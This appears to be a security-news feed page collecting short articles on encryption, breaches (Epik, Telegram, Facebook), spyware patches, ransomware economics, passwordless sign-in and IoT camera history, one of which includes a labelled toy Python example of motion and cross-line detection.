End-to-end encryption is not a normal phone standard, so both parties on the call will need to be firmly in the Google Fi ecosystem for the feature to work. Google’s description says that “calls between two Android phones on Fi will be secured with end-to-end encryption by default.” Google Fi works on the iPhone, too, but given that Google would have to use Apple’s default phone app, it can’t add encryption.

For encrypted Fi-to-Fi calls, Google will show a new “Encrypted by Google Fi” message in both users’ phone apps, along with the ubiquitous lock icon. The company says there will be “unique audio cues” as well.

#encryption, #google-fi, #security, #tech

Securing your digital life, part two: The bigger picture—and special circumstances

In the first half of this guide to personal digital security, I covered the basics of assessing digital risks and protecting what you can control: your devices. But the physical devices you use represent only a fraction of your overall digital exposure.

According to a report by Aite Group, nearly half of US consumers experienced some form of identity theft over the last two years. Losses from these thefts are expected to reach $721.3 billion for 2021—and that’s only counting cases where criminals take over and abuse online accounts. Other valuable parts of your digital life may not carry specific monetary risks to you but could still have a tangible impact on your privacy, safety, and overall financial health.

Case in point: last September, my Twitter account was targeted for takeover by an unidentified attacker. Even though I had taken multiple measures to prevent the theft of my account (including two-factor authentication), the attacker made it impossible for me to log in (though they were locked out of the account as well). It took several weeks and some high-level communication with Twitter to restore my account. As someone whose livelihood is tied to getting the word out about things with a verified Twitter account, this went beyond inconvenience and was really screwing with my job.

#biz-it, #features, #infosec, #securing-your-digital-life, #security

Securing your digital life, part one: The basics

Artist’s impression of how to keep your digital stuff safe from all kinds of threats. (credit: Aurich Lawson | Getty Images)

I spend most of my time these days investigating the uglier side of digital life—examining the techniques, tools, and practices of cyber criminals to help people better defend against them. It’s not entirely different from my days at Ars Technica, but it has given me a greater appreciation for just how hard it is for normal folks to stay “safe” digitally.

Even those who consider themselves well educated about cyber crime and security threats—and who do everything they’ve been taught to do—can (and do!) still end up as victims. The truth is that, with enough time, resources, and skill, everything can be hacked.

The key to protecting your digital life is to make it as expensive and impractical as possible for someone bent on mischief to steal the things most important to your safety, financial security, and privacy. If attackers find it too difficult or expensive to get your stuff, there’s a good chance they’ll simply move on to an easier target. For that reason, it’s important to assess the ways that vital information can be stolen or leaked—and understand the limits to protecting that information.

#biz-it, #features, #infosec, #securing-your-digital-life, #security

Researcher refuses Telegram’s bounty award, discloses auto-delete bug

Telegram patched another image self-destruction bug in its app earlier this year. This flaw was a different issue from the one reported in 2019. But the researcher who reported the bug isn’t pleased with Telegram’s months-long turnaround time—and an offered $1,159 (€1,000) bounty award in exchange for his silence.

Self-destructed images remained on the device

Like other messaging apps, Telegram allows senders to set communications to “self-destruct,” such that messages and any media attachments are automatically deleted from the device after a set period of time. Such a feature offers extended privacy to both the senders and the recipients intending to communicate discreetly.

In February 2021, Telegram introduced a set of such auto-deletion features in its 2.6 release:

#biz-it, #bug-bounty, #confidential, #end-to-end-encryption, #hackerone, #messaging-app, #nda, #security, #tech, #telegram

Facebook’s latest “apology” reveals security and safety disarray

A person in a Hazmat suit covers the Facebook logo with warning tape. (credit: Aurich Lawson / Getty Images)

Facebook had it rough last week. Leaked documents—many leaked documents—formed the backbone of a string of reports published in The Wall Street Journal. Together, the stories paint the picture of a company barely in control of its own creation. The revelations run the gamut: Facebook had created special rules for VIPs that largely exempted 5.8 million users from moderation, forced troll farm content on 40 percent of America, created toxic conditions for teen girls, ignored cartels and human traffickers, and even undermined CEO Mark Zuckerberg’s own desire to promote vaccination against COVID.

Now, Facebook wants you to know it’s sorry and that it’s trying to do better.

“In the past, we didn’t address safety and security challenges early enough in the product development process,” the company said in an unsigned press release today. “Instead, we made improvements reactively in response to a specific abuse. But we have fundamentally changed that approach.”

#facebook, #mark-zuckerberg, #policy, #security, #social-media

Stairwell secures $20M Series A to help organizations outsmart attackers

Back when Stairwell emerged from stealth in 2020, the startup was shrouded in secrecy. Now with $20 million in Series A funding, its founder and CEO Mike Wiacek — who previously served as chief security officer at Chronicle, Google’s moonshot cybersecurity company — is ready to talk.

As well as raising $20M, an investment round co-led by Sequoia Capital and Accel, Stairwell is launching Inception, a threat hunting platform that aims to help organizations determine if they were compromised now or in the past. Unlike other threat detection platforms, Inception takes an “inside out” approach to cybersecurity, which starts by looking inwards at a company’s data.

“This helps you study what’s in your environment first before you start thinking about what’s happening in the outside world,” Wiacek tells TechCrunch. “The beautiful thing about that approach is that’s not information that outside parties, a.k.a. the bad guys, are privy to.”

This data, all of which is treated as suspicious, is continuously evaluated in light of new indicators and new threat intelligence. Stairwell claims this enables organizations to detect anomalies within just days, rather than the industry average of 280 days, as well as to “bootstrap” future detections.

“If you go and buy a threat intelligence feed from Vendor X, do you really think that someone who’s spending hundreds of thousands, or even millions of dollars to conduct an offensive campaign isn’t going to make sure that whatever they’re using isn’t in that field?” said Wiacek. “They know what McAfee knows and they know what other antivirus engines know, but they don’t know what you know and that’s a very powerful advantage that you have there.”

Stairwell’s $20 million in Series A funding, which comes less than 12 months after it secured $4.5 million in seed funding, will be used to further advance the Inception platform and to increase the startup’s headcount; the Palo Alto-based firm currently has a modest headcount of 21.

The Inception platform, which the startup claims finally enables enterprises to “outsmart the bad guys”, is launching in early release for a limited number of customers, with full general availability scheduled for 2022.

“I just wish we had a product to market when SolarWinds happened,” Wiacek added.

#accel, #anomali, #ceo, #computer-security, #computing, #google-cloud, #inception, #information-technology, #mcafee, #palo-alto, #security, #sequoia-capital, #solarwinds, #stairwell, #system-administration

F5 acquires cloud security startup Threat Stack for $68 million

Applications networking company F5 has announced it’s acquiring Threat Stack, a Boston-based cloud security and compliance startup, for $68 million.

The deal, which comes months after F5 bought multi-cloud management startup Volterra for $500 million, sees the 25-year-old company looking to bolster its cloud security portfolio as applications become a growing focus for cybercriminals. Businesses lose more than $100 billion a year to attacks targeting digital experiences, F5 says, and these experiences are increasingly powered by applications distributed across multiple environments and interconnected through APIs.

Threat Stack, which was founded in November 2012 and has since amassed more than $70 million across six funding rounds including a $45 million Series C round led by F-Prime Capital Partners and Eight Roads Ventures, specializes in cloud security for applications and provides customers with real-time threat detection for cloud infrastructure and workloads. Unlike many cloud security tools that kick in after an intrusion, Threat Stack takes a more proactive approach, alerting organizations to all known vulnerabilities and providing a report on the holes that need to be plugged.

The startup’s intrusion detection platform, the Threat Stack Cloud Security Platform, works across cloud, hybrid cloud, multi-cloud, and containerized environments, and is perhaps best known for its Slack integration that alerts DevOps teams to security concerns in real time. Threat Stack has a number of big-name customers, according to its website, including Glassdoor, Ping Identity and Proofpoint.

F5 says that integrating its application and API protection solutions with Threat Stack’s cloud security capabilities and expertise will enhance visibility across application infrastructure and workloads, making it easier for customers to adopt consistent security in any cloud.

“Applications are the backbone of today’s modern businesses, and protecting them is mission-critical for our customers,” said Haiyan Song, EVP of Security at F5. “Threat Stack brings technology and talent that will strengthen F5’s security capabilities and further our adaptive applications vision with broader cloud observability and actionable security insights for customers.”

The acquisition, which is expected to close in F5’s first-quarter fiscal year 2022, is subject to closing conditions.

#api, #boston, #cloud-computing, #cloud-infrastructure, #cloud-management, #computing, #eight-roads-ventures, #f5, #glassdoor, #palo-alto-networks, #ping-identity, #security, #splunk, #system-administration, #threat-stack, #volterra

Web host Epik was warned of a critical website bug weeks before it was hacked

Hackers associated with the hacktivist collective Anonymous say they have leaked gigabytes of data from Epik, a web host and domain registrar that provides services to far-right sites like Gab, Parler and 8chan, which found refuge in Epik after they were booted from mainstream platforms.

In a statement attached to a torrent file of the dumped data this week, the group said the 180 gigabytes amounts to a “decade’s worth” of company data, including “all that’s needed to trace actual ownership and management” of the company. The group claimed to have customer payment histories, domain purchases and transfers, and passwords, credentials, and employee mailboxes. The cache of stolen data also contains files from the company’s internal web servers, and databases that contain customer records for domains that are registered with Epik.

The hackers did not say how they obtained the breached data or when the hack took place, but timestamps on the most recent files suggest the hack likely happened in late February.

Epik initially told reporters it was unaware of a breach, but an email sent out by founder and chief executive Robert Monster on Wednesday alerted users to an “alleged security incident.”

TechCrunch has since learned that Epik was warned of a critical security flaw weeks before its breach.

Security researcher Corben Leo contacted Epik’s chief executive Monster over LinkedIn in January about a security vulnerability on the web host’s website. Leo asked if the company had a bug bounty or a way to report the vulnerability. LinkedIn showed Monster had read the message but did not respond.

Leo told TechCrunch that a library used on Epik’s WHOIS page for generating PDF reports of public domain records had a decade-old vulnerability that allowed anyone to remotely run code directly on the internal server without any authentication, such as a company password.

“You could just paste this [line of code] in there and execute any command on their servers,” Leo told TechCrunch.

Leo ran a proof-of-concept command from the public-facing WHOIS page to ask the server to display its username, which confirmed that code could run on Epik’s internal server, but he did not test to see what access the server had as doing so would be illegal.

It’s not known if the Anonymous hacktivists used the same vulnerability that Leo discovered. (Part of the stolen cache also includes folders relating to Epik’s WHOIS system, but the hacktivists left no contact information and could not be reached for comment.) But Leo contends that if a hacker exploited the same vulnerability and the server had access to other servers, databases or systems on the network, that foothold could have exposed the kind of data stolen from Epik’s internal network in February.

“I am really guessing that’s how they got owned,” Leo told TechCrunch, who confirmed that the flaw has since been fixed.

Monster confirmed he received Leo’s message on LinkedIn, but did not answer our questions about the breach or say when the vulnerability was patched. “We get bounty hunters pitching their services. I probably just thought it was one of those,” said Monster. “I am not sure if I actioned it. Do you answer all your LinkedIn spams?”

#8chan, #computer-security, #computing, #cyberspace, #cyberwarfare, #epik, #gab, #parler, #rob-monster, #security, #texas, #world-wide-web

FTC says health apps must notify consumers about data breaches — or face fines

The U.S. Federal Trade Commission (FTC) has warned apps and devices that collect personal health information must notify consumers if their data is breached or shared with third parties without their permission.

In a 3-2 vote on Wednesday, the FTC agreed on a new policy statement to clarify the decade-old 2009 Health Breach Notification Rule, which requires companies handling health records to notify consumers if their data is accessed without permission, for instance as the result of a breach. This has now been extended to apply to health apps and devices — specifically calling out apps that track fertility data, fitness, and blood glucose — which “too often fail to invest in adequate privacy and data security,” according to FTC chair Lina Khan.

“Digital apps are routinely caught playing fast and loose with user data, leaving users’ sensitive health information susceptible to hacks and breaches,” said Khan in a statement, pointing to a study published this year in the British Medical Journal that found health apps suffer from “serious problems” ranging from the insecure transmission of user data to the unauthorized sharing of data with advertisers.

There have also been a number of high-profile breaches involving health apps in recent years. Babylon Health, a U.K. AI chatbot and telehealth startup, last year suffered a data breach after a “software error” allowed users to access other patients’ video consultations, while period tracking app Flo was recently found to be sharing users’ health data with third-party analytics and marketing services.

Under the new rule, any company offering health apps or connected fitness devices that collect personal health data must notify consumers if their data has been compromised. However, the rule doesn’t define a “data breach” as just a cybersecurity intrusion; unauthorized access to personal data, including the sharing of information without an individual’s permission, can also trigger notification obligations.

“While this rule imposes some measure of accountability on tech firms that abuse our personal information, a more fundamental problem is the commodification of sensitive health information, where companies can use this data to feed behavioral ads or power user analytics,” Khan said.

If companies don’t comply with the rule, the FTC said it will “vigorously” enforce fines of $43,792 per violation per day.

The FTC has been cracking down on privacy violations in recent weeks. Earlier this month, the agency unanimously voted to ban spyware maker SpyFone and its chief executive Scott Zuckerman from the surveillance industry for harvesting mobile data on thousands of people and leaving it on the open internet.

#articles, #artificial-intelligence, #babylon-health, #chair, #data-breach, #digital-rights, #flo, #government, #identity-management, #lina-khan, #open-internet, #security, #security-breaches, #social-issues, #spyfone, #terms-of-service

Ransomware: A market problem deserves a market solution

REvil is a solid choice for a villain’s name: R Evil. Revil. Evil and yet fun. I could imagine Black Widow, Hulk and Spider-Man teaming up to topple the leadership of REvil Incorporated.

The criminal gang using the name REvil may have enabled ransomware attacks on thousands of small businesses worldwide this summer — but the ransomware problem is bigger than REvil, LockBit or DarkSide. REvil has disappeared from the internet, but the ransomware problem persists.

REvil is a symptom, not the cause. I advise Tony Stark and his fellow Avengers to look past any one criminal organization — because there is no evil mastermind. Ransomware is just the latest in the 50,000-year evolution of petty criminals discovering get-rich-quick schemes.

The massive boom in the number of ransomware occurrences arises from the lack of centralized control. More than 304 million ransomware attacks hit global businesses last year, with costs surpassing $178,000 per event. Technology has created a market where countless petty criminals can make good money fast. The best way to fight this kind of threat is with a market-based approach.

The spike in global ransomware attacks reflects a massive “dumbing down” of criminal activity. People looking to make an illicit buck have many more options available to them today than they did even two years ago. Without technical chops, people can steal your data, hold it for ransom and coerce you to pay to get it back. Law enforcement has not yet responded to combat this form of cybercrime, and large, sophisticated criminal networks have likewise not yet figured out how to control the encroaching upstarts.

The spike in ransomware attacks is attributable to the “as a service” economy. In this case, we’re talking about RaaS, or ransomware as a service. This works because each task in the ransomware chain benefits from the improved sophistication enabled by the division of labor and specialization.

Someone finds a vulnerable target. Someone provides bulletproof infrastructure outside of the jurisdiction of responsible law enforcement. Someone provides the malicious code. The players all come together without knowing each other’s names. No need to meet in person as Mr. Pink, Mr. Blonde and Mr. Orange because the ability to coordinate tasks has become simple. The rapid pace of technological innovation created a decentralized market, enabling amateurs to engage in high-dollar crimes.

There’s a gig economy for the underworld just like there is for the legal business world. I’ve built two successful software companies, even though I’m an economist. I use open source software and rent infrastructure via cloud technologies. I operated my first software company for six years before I sought outside capital, and I used that money for marketing and sales more than technology.

This tech advancement is both good and bad. The global economy did better than expected during a global pandemic because technology enabled many people to work from anywhere.

But the illicit markets of crime also benefited. REvil provided a service — a piece of a larger network — and earned a share of proceeds from ransomware attacks committed by others — like Jeff Bezos and Amazon get a share of my company’s revenues for the services they provide to me.

To fight ransomware attacks, appreciate the economics — the markets that enable ransomware — and change the market dynamics. Specifically, do three things:

1. Analyze the market like a business executive

Any competitive business thinks about what’s allowing competitors to succeed and how they can outcompete. The person behind a ransomware strike is an entrepreneur or a worker in a firm engaged in cybercrime, so start with good business analytics using data and smart business questions.

Can the crypto technologies that enable the crime also be used to enable entity resolution and deny anonymity/pseudonymity? Can technology undermine a criminal’s ability to recruit, coordinate or move, store and spend the proceeds from criminal activities?

2. Define victory in market terms

Doing the analytics to understand competing firms allows one to more clearly see the market for ransomware. Eliminating one “firm” often creates a power vacuum that will be filled by another, provided the market remains the same.

REvil disappeared, but ransomware attacks persist. Victory in market terms means creating markets in which criminals choose not to engage in the activity in the first place. The goal is not to catch criminals, but to deter the crime. Victory against ransomware happens when arrests drop because attempted attacks drop to near zero.

3. Combat RaaS as an entrepreneur in a competitive market

To prevent ransomware is to fight against criminal entrepreneurs, so the task requires one to think and fight crime like an entrepreneur.

Crime-fighting entrepreneurs require collaboration — networks of government officials, banking professionals and technologists in the private sector across the globe must come together.

Through artificial intelligence and machine learning, the capability to securely share data, information and knowledge while preserving privacy exists. The tools of crime become the tools to combat crime.

No evil mastermind sits in their lair laughing at the chaos inflicted on the economy. Instead, growing numbers of amateurs are finding ways to make money quickly. Tackling the ransomware industry requires the same coordinated focus on the market that enabled amateurs to enter cybercrime in the first place. Iron Man would certainly agree.

#column, #computer-security, #crime, #cybercrime, #machine-learning, #malware, #open-source-software, #ransomware, #security, #security-breaches, #tc

Microsoft now lets you sign-in without a password

Microsoft is further nudging users away from passwords by rolling out passwordless sign-in options to all consumer Microsoft accounts.

The tech giant, like many others in the industry, has waged a war against traditional password-based authentication for some time. This is because passwords are a prime target for cyberattacks, since weak or reused passwords can be guessed or brute-forced through automated attacks.

To that end, and as it gears up to launch Windows 11 in just a few weeks’ time, Microsoft is rolling out its passwordless sign-in option, previously available only to commercial customers, to all Microsoft accounts. This means that users will be able to sign in to services, such as Outlook and OneDrive, without having to use a password. Instead, users can use the Microsoft Authenticator app, Windows Hello, a security key, and SMS or emailed codes.

Some Microsoft apps will still continue to require a password, however, including Office 2010 or earlier, Remote Desktop and Xbox 360. Similarly, those using now-unsupported versions of Windows won’t be able to ditch their passwords just yet either, as the feature will only be supported on Windows 10 and Windows 11.

Microsoft says that passwordless sign-in will be rolled out to consumer accounts over the coming weeks, so you might not be able to get rid of your password just yet. It added that it’s also working on a way to eliminate passwords for Azure AD accounts, with admins set to be able to choose whether passwords are required, allowed, or don’t exist for specific users.

#security

Apple patches “FORCEDENTRY” zero-day exploited by Pegasus spyware

Apple has released several security updates this week to patch a “FORCEDENTRY” vulnerability on iOS devices. The “zero-click, zero-day” vulnerability has been actively exploited by Pegasus, a spyware app developed by the Israeli company NSO Group, which has been known to target activists, journalists, and prominent people around the world.

Tracked as CVE-2021-30860, the vulnerability needs little to no interaction by an iPhone user to be exploited—hence the name “FORCEDENTRY.”

Discovered on a Saudi activist’s iPhone

In March, researchers at The Citizen Lab decided to analyze the iPhone of an unnamed Saudi activist who was targeted by NSO Group’s Pegasus spyware. They obtained an iTunes backup of the device, and a review of the dump revealed 27 copies of a mysterious GIF file in various places—except the files were not images.

#apple, #biz-it, #imessage, #ios, #iphone, #nso-group, #pegasus, #security, #spyware, #tech, #vulnerability, #zero-day

Apple patches a NSO zero-day flaw affecting all devices

Apple has released security updates for a newly discovered zero-day vulnerability that affects every iPhone, iPad, Mac and Apple Watch. Citizen Lab, which discovered the vulnerability and was credited with the find, urges users to immediately update their devices.

The technology giant said iOS 14.8 for iPhones and iPads, as well as new updates for Apple Watch and macOS, will fix at least one vulnerability that it said “may have been actively exploited.”

Citizen Lab said it has now discovered new artifacts of the ForcedEntry vulnerability, details it first revealed in August as part of an investigation into the use of a zero-day vulnerability that was used to silently hack into iPhones belonging to at least one Bahraini activist.

Last month, Citizen Lab said the zero-day flaw — named as such since it gives companies zero days to roll out a fix — took advantage of a flaw in Apple’s iMessage, which was exploited to push the Pegasus spyware, developed by Israeli firm NSO Group, to the activist’s phone. The breach was significant because the flaws exploited the latest iPhone software at the time, both iOS 14.4 and later iOS 14.6, which Apple released in May. The vulnerabilities also broke through new iPhone defenses that Apple had baked into iOS 14, dubbed BlastDoor, which were supposed to prevent silent attacks by filtering potentially malicious code. Citizen Lab calls this particular exploit ForcedEntry for its ability to skirt Apple’s BlastDoor protections.

In its latest findings, Citizen Lab said it found evidence of the ForcedEntry exploit on the iPhone of a Saudi activist, which was running the latest version of iOS at the time. Citizen Lab now says that the same ForcedEntry exploit works on all Apple devices running what was, until today, the latest software.

Citizen Lab said it reported its findings to Apple on September 7. Apple pushed out the updates for the vulnerability, known officially as CVE-2021-30860. Citizen Lab said it attributes the ForcedEntry exploit to NSO Group with high confidence, citing evidence it has seen that it has not previously published.

When reached, Apple declined to comment. NSO Group did not immediately comment.

Developing… More soon…

#apple, #imessage, #ios, #ipad, #ipads, #iphone, #mobile-phones, #nso-group, #operating-systems, #pegasus, #security, #smartphones, #spyware, #technology

The past, present and future of IoT in physical security

When Axis Communications released the first internet protocol (IP) camera after the 1996 Olympic games in Atlanta, there was some initial confusion. Connected cameras weren’t something the market had been clamoring for, and many experts questioned whether they were even necessary.

Today, of course, traditional analog cameras have been almost completely phased out as organizations have recognized the tremendous advantage that IoT devices can offer, but that technology felt like a tremendous risk during those early days.

To say that things have changed since then would be a dramatic understatement. The growth of the Internet of Things (IoT) represents one of the ways physical security has evolved. Connected devices have become the norm, opening up exciting new possibilities that go far beyond recorded video. Further developments, such as the improvement and widespread acceptance of the IP camera, have helped power additional breakthroughs including improved analytics, increased processing power, and the growth of open-architecture technology. On the 25th anniversary of the initial launch of the IP camera, it is worth reflecting on how far the industry has come — and where it is likely to go from here.

Tech improvements herald the rise of IP cameras

Comparing today’s IP cameras to those available in 1996 is almost laughable. While they were certainly groundbreaking at the time, those early cameras could record just one frame every 17 seconds — quite a change from what cameras can do today.

But despite this drawback, those on the cutting edge of physical security understood what a monumental breakthrough the IP camera could represent. After all, creating a network of cameras would enable more effective remote monitoring, which — if the technology could scale — would enable them to deploy much larger systems, tying together disparate groups of cameras. Early applications might include watching oil fields, airport landing strips or remote cell phone towers. Better still, the technology had the potential to usher in an entirely new world of analytics capabilities.

Of course, better chipsets were needed to make that endless potential a reality. Groundbreaking or not, the limited frame rate of the early cameras was never going to be effective enough to drive widespread adoption of traditional surveillance applications. Solving this problem required a significant investment of resources, but before long these improved chipsets brought IP cameras from one frame every 17 seconds to 30 frames per second. Poor frame rate could no longer be listed as a justification for shunning IP cameras in favor of their analog cousins, and developers could begin to explore the devices’ analytics potential.

Perhaps the most important technological leap was the introduction of embedded Linux, which made IP cameras more practical from a developer point of view. During the 1990s, most devices used proprietary operating systems, which made them difficult to develop for.

Even within the companies themselves, proprietary systems meant that developers had to be trained on a specific technology, costing companies both time and money. There were a few attempts at standardization within the industry, such as the Wind River operating system, but these ultimately failed. They were too small, with limited resources behind them — and besides, a better solution already existed: Linux.

Linux offered a wide range of benefits, not the least of which was the ability to collaborate with other developers in the open source community. This was a road that ran two ways. Because most IP cameras lacked the hard disk necessary to run Linux, a file system known as JFFS (the Journalling Flash File System) was developed that would allow a device to use a Flash memory chip as a hard disk. That technology was contributed to the open source community, and while it is currently on its third iteration, it remains in widespread use today.

Compression technology represented a similar challenge, with the more prominent data compression models in the late ’90s and early 2000s poorly suited for video. At the time, video storage involved individual frames being stored one-by-one — a data storage nightmare. Fortunately, the H.264 compression format, which was designed with video in mind, became much more commonplace in 2009.

By the end of that year, more than 90% of IP cameras and most video management systems used the H.264 compression format. It is important to note that improvements in compression capabilities have also enabled manufacturers to improve their video resolution. Before the new compression format, video resolution had not changed since the ’60s with NTSC/PAL. Today, most cameras are capable of recording in high definition (HD).

1996: First IP camera is released.
2001: Edge-based analytics with video motion detection arrive.
2006: First downloadable, edge-based analytics become available.
2009: Full HD becomes the standard video resolution; H.264 compression goes mainstream.
2015: Smart compression revolutionizes video storage.

The growth of analytics

Analytics is not exactly a “new” technology — customers requested various analytics capabilities even in the early days of the IP camera — but it is one that has seen dramatic improvement. Although it might seem quaint by today’s high standards, video motion detection was one of the earliest analytics loaded onto IP cameras.

Customers needed a way to detect movement within certain parameters to avoid having a tree swaying in the wind, or a squirrel running by, trigger a false alarm. Further refinement of this type of detection and recognition technology has helped automate many aspects of physical security, triggering alerts when potentially suspicious activity is detected and ensuring that it is brought to human attention. By taking human fallibility out of the equation, analytics has turned video surveillance from a reactive tool to a proactive one.

Reliable motion detection remains one of the most widely used analytics, and while false alarms can never be entirely eliminated, modern improvements have made it a reliable way to detect potential intruders. Object detection is also growing in popularity and is increasingly capable of classifying cars, people, animals and other objects.

License plate recognition is popular in many countries (though less so in the United States), not just for identifying vehicles involved in criminal activity, but for uses as simple as parking recognition. Details like car model, shirt color or license plate number are easy for the human eye to miss or fail to notice — but thanks to modern analytics, that data is cataloged and stored for easy reference. The advent of technology like deep learning, which features better pattern recognition and object classification through improved labeling and categorization, will drive further advancements in this area of analytics.

The rise of analytics also helps highlight why the security industry has embraced open-architecture technology. Simply put, it is impossible for a single manufacturer to keep up with every application that its customers might need. By using open-architecture technology, they can empower those customers to seek out the solutions that are right for them, without the need to specifically tailor the device for certain use cases. Hospitals might look to add audio analytics to detect signs of patient distress; retail stores might focus on people counting or theft detection; law enforcement might focus on gunshot detection — with all of these applications housed within the same device model.

It is also important to note that the COVID-19 pandemic drove interesting new uses for both physical security devices and analytics — though some applications, such as using thermal cameras for fever measurement, proved difficult to implement with a high degree of accuracy. Within the healthcare industry, camera usage increased significantly — something that is unlikely to change. Hospitals have seen the benefit of cameras within patient rooms, with video and intercom technology enabling healthcare professionals to monitor and communicate with patients while maintaining a secure environment.

Even simple analytics like cross-line detection can generate an alert if a patient who is a fall risk attempts to leave a designated area, potentially reducing accidents and overall liability. The fact that analytics like this bear only a passing mention today highlights how far physical security has come since the early days of the IP camera.
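The two analytics mentioned above, motion detection with a minimum object size (so a squirrel or a swaying branch does not raise an alarm) and cross-line detection (an alert when a tracked object’s path crosses a virtual line), can be shown end to end on tiny constructed frames. The following is an added example written for this article; it is not code from Axis or from any camera vendor. It assumes a static background frame, grayscale frames as lists of lists, a hypothetical intensity threshold of 40 and a hypothetical minimum object area of 4 pixels; real products use far more elaborate background models and tracking, but the structure is the same.

```python
"""Toy video-analytics pipeline: background subtraction with a minimum
object size, then cross-line detection on the object's centroid.

Added example, not code from the original article. All frames are
constructed in-line (12x12 grayscale, values 0-255) so it runs offline.
Coordinates are (row, col), i.e. (y, x).
"""
from collections import deque

# Hypothetical virtual line running down the middle of the frame at x = 5.
LINE = ((0, 5), (11, 5))


def make_frame(height, width, objects):
    """Constructed frame: black background with bright rectangles drawn on it.
    objects: list of (top, left, h, w, intensity)."""
    frame = [[0] * width for _ in range(height)]
    for top, left, h, w, value in objects:
        for y in range(top, top + h):
            for x in range(left, left + w):
                frame[y][x] = value
    return frame


def foreground_mask(background, frame, threshold):
    """True where the pixel differs from the background by more than threshold."""
    return [[abs(f - b) > threshold for f, b in zip(frow, brow)]
            for frow, brow in zip(frame, background)]


def connected_components(mask):
    """4-connected blobs in a boolean mask; each blob is a list of (y, x)."""
    h, w = len(mask), len(mask[0])
    seen = [[False] * w for _ in range(h)]
    blobs = []
    for y in range(h):
        for x in range(w):
            if not mask[y][x] or seen[y][x]:
                continue
            blob, queue = [], deque([(y, x)])
            seen[y][x] = True
            while queue:
                cy, cx = queue.popleft()
                blob.append((cy, cx))
                for ny, nx in ((cy - 1, cx), (cy + 1, cx), (cy, cx - 1), (cy, cx + 1)):
                    if 0 <= ny < h and 0 <= nx < w and mask[ny][nx] and not seen[ny][nx]:
                        seen[ny][nx] = True
                        queue.append((ny, nx))
            blobs.append(blob)
    return blobs


def detect_objects(background, frame, threshold=40, min_area=4):
    """Foreground blobs of at least min_area pixels, with area and centroid.
    min_area is the 'squirrel filter': small changes are dropped as noise."""
    objects = []
    for blob in connected_components(foreground_mask(background, frame, threshold)):
        if len(blob) < min_area:
            continue
        cy = sum(p[0] for p in blob) / len(blob)
        cx = sum(p[1] for p in blob) / len(blob)
        objects.append({"area": len(blob), "centroid": (cy, cx)})
    return objects


def _orient(p, q, r):
    """Sign of the 2-D cross product (q - p) x (r - p): -1, 0 or 1."""
    v = (q[0] - p[0]) * (r[1] - p[1]) - (q[1] - p[1]) * (r[0] - p[0])
    return (v > 0) - (v < 0)


def segments_cross(p1, p2, a, b):
    """True if the movement segment p1-p2 crosses the virtual line segment a-b."""
    return (_orient(a, b, p1) != _orient(a, b, p2)
            and _orient(p1, p2, a) != _orient(p1, p2, b))


def run_demo():
    """Two constructed frames: a 3x3 'patient' that moves from the left of the
    line to the right of it, plus a 2-pixel 'squirrel' that must be ignored."""
    background = make_frame(12, 12, [])
    frame1 = make_frame(12, 12, [(4, 1, 3, 3, 200), (9, 8, 1, 2, 200)])
    frame2 = make_frame(12, 12, [(4, 7, 3, 3, 200), (10, 9, 1, 2, 200)])
    objs1 = detect_objects(background, frame1)
    objs2 = detect_objects(background, frame2)
    crossed = segments_cross(objs1[0]["centroid"], objs2[0]["centroid"], *LINE)
    return {"objects_frame1": len(objs1), "objects_frame2": len(objs2),
            "crossed": crossed}


if __name__ == "__main__":
    print(run_demo())  # {'objects_frame1': 1, 'objects_frame2': 1, 'crossed': True}
```

Running `run_demo()` reports one object in each frame (the squirrel falls under `min_area` and is dropped) and `crossed` as `True`, because the centroid moved from column 2 to column 8 across the line at column 5. Lowering `min_area` to 1 makes the squirrel count as an object too, which is exactly the false-alarm problem the early motion-detection parameters were introduced to avoid.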

Looking to the future of security

That said, an examination of today’s trends can provide a glimpse into what the future might hold for the security industry. For instance, video resolution will certainly continue to improve.

Ten years ago, the standard resolution for video surveillance was 720p (1 megapixel), and 10 years before that it was the analog NTSC/PAL resolution of 572×488, or 0.3 megapixels. Today, the standard resolution is 1080p (2 megapixels), and a healthy application of Moore’s law indicates that 10 years from now it will be 4K (8 megapixels).

As ever, the amount of storage that higher-resolution video generates is the limiting factor, and the development of smart storage technologies such as Zipstream has helped tremendously in recent years. We will likely see further improvements in smart storage and video compression that will help make higher-resolution video possible.

Cybersecurity will also be a growing concern for both manufacturers and end users.

Recently, one of Sweden’s largest retailers was shut down for a week because of a hack, and others will meet the same fate if they continue to use poorly secured devices. Any piece of software can contain a bug, but only developers and manufacturers committed to identifying and fixing these potential vulnerabilities can be considered reliable partners. Governments across the globe will likely pass new regulations mandating cybersecurity improvements, with California’s recent IoT protection law serving as an early indicator of what the industry can expect.

Finally, ethical behavior will continue to become more important. A growing number of companies have begun foregrounding their ethics policies, issuing guidelines for how they expect technology like facial recognition to be used — not abused.

While new regulations are coming, it’s important to remember that regulation always lags behind, and companies that wish to have a positive reputation will need to adhere to their own ethical guidelines. More and more consumers now list ethical considerations among their major concerns—especially in the wake of the COVID-19 pandemic—and today’s businesses will need to strongly consider how to broadcast and enforce responsible product use.

Change is always around the corner

Physical security has come a long way since the IP camera was introduced, but it is important to remember that these changes, while significant, took place over more than two decades. Changes take time — often more time than you might think. Still, it is impossible to compare where the industry stands today to where it stood 25 years ago without being impressed. The technology has evolved, end users’ needs have shifted, and even the major players in the industry have come and gone according to their ability to keep up with the times.

Change is inevitable, but careful observation of today’s trends and how they fit into today’s evolving security needs can help today’s developers and device manufacturers understand how to position themselves for the future. The pandemic highlighted the fact that today’s security devices can provide added value in ways that no one would have predicted just a few short years ago, further underscoring the importance of open communication, reliable customer support and ethical behavior.

As we move into the future, organizations that continue to prioritize these core values will be among the most successful.

#column, #facial-recognition, #hardware, #internet-protocol, #ip-camera, #linux, #opinion, #physical-security, #security, #surveillance, #tc

BitSight raises $250M from Moody’s and acquires cyber risk startup VisibleRisk

BitSight, a startup that assesses the likelihood that an organization will be breached, has received a $250 million investment from credit rating giant Moody’s, and acquired Israeli cyber risk assessment startup VisibleRisk for an undisclosed sum.

Boston-based BitSight says the investment from Moody’s, which has long warned that cyber risk can impact credit ratings, will enable it to create a cybersecurity risk platform, while the credit ratings giant said it plans to make use of BitSight’s cyber risk data and research across its integrated risk assessment product offerings.

The investment values BitSight at $2.4 billion and makes Moody’s the largest shareholder in the company.

“Creating transparency and enabling trust is at the core of Moody’s mission,” Moody’s president and CEO Rob Fauber said in a statement. “BitSight is the leader in the cybersecurity ratings space, and together we will help market participants across disciplines better understand, measure, and manage their cyber risks and translate that to the risk of cyber loss.”

